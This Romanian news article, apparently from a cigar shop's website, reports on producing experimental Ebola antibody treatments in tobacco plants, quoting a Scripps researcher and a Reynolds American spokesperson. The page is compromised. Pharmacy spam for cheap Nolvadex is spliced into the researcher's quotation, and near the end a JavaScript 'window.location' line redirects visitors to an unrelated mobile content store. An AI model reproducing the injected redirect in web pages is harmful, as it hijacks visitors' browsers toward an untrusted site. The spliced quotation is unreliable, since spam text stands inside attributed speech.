Tutunul, soluţia împotriva virusului Ebola?

Tigari dominicane

 

Oamenii de ştiinţă caută de ceva timp modalităţi prin care să transforme tutunul într-o modalitate ieftină şi rapidă de a produce tratamente biotehnologice eficiente, concentrându-şi mai nou atenţia pe crearea unui medicament care să vindece virusul Ebola.

Tratamentul este format din proteine numite „anticorpi monoclonali” care ar putea să inactiveze şi să trateze virusul Ebola şi a fost produs din plantele de tutun a companiei de tabac Reynolds American.

„Tutunul ar putea fi soluţia, deoarece este ieftin şi permite producerea în masă a acestui medicament”, declară Purchase Discount Medication! Buy cheap Nolvadex Online. Cheapest Rates, Generic Nolvadex Pictures. Erica Ollmann Saphire, profesor şi cercetător în domeniul bolilor virale la Institutul de Cercetare Scripps.

Metoda standard de inginerie genetică şi producţie de medicamente, se face prin„strecurarea” de ADN în bacterii, producând o proteină care poate fi folosită pentru a combate o anumită boală.

Noua abordare a tratamentelor se numeşte „pharming” şi presupune utilizarea unei plante în locul unei bacterii, în cazul tratamentului pentru Ebola fiind folosită planta de tutun, Nicotiana benthanmianas.

Procesul de producere este similar cu a celorlalte medicamente. O genă este introdusă în virus, care este apoi utilizat pentru a infecta planta de tutun. Virusul acţionează imediat, transferând ADN-ul creat, în plantă.

Celulele infectate şi gena pe care o transportă produc proteina care stopează virusul. Frunzele de tutun sunt apoi recoltate şi prelucrate pentru a extrage proteina respectivă, care este apoi purificată şi transformată în medicament.

Tratamentul a fost produs doar în cantităţi mici până acum, dar interesul pentru el este extrem de mare. În prezent, se dezbate intens subiectul propunerii sale pe piaţa de medicamente, pentru a-l face accesibil mai ales în Africa, unde sute de oameni au fost afectaţi deja de Ebola.

Cu toate că medicamentul nu a fost încă aprobat de FDA, producătorii au speranţe mari. „Vrem să avem un impact mare asupra vindecării Ebola, iar asta ar putea să fie soluţia.Planta de tutun creşte repede, proteina „vindecătoare” putând să fie extrasă în maxim o săptămână”, declară David Howard, purtătorul de cuvând al companiei Reynolds.

Sursa: www.csid.ro

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *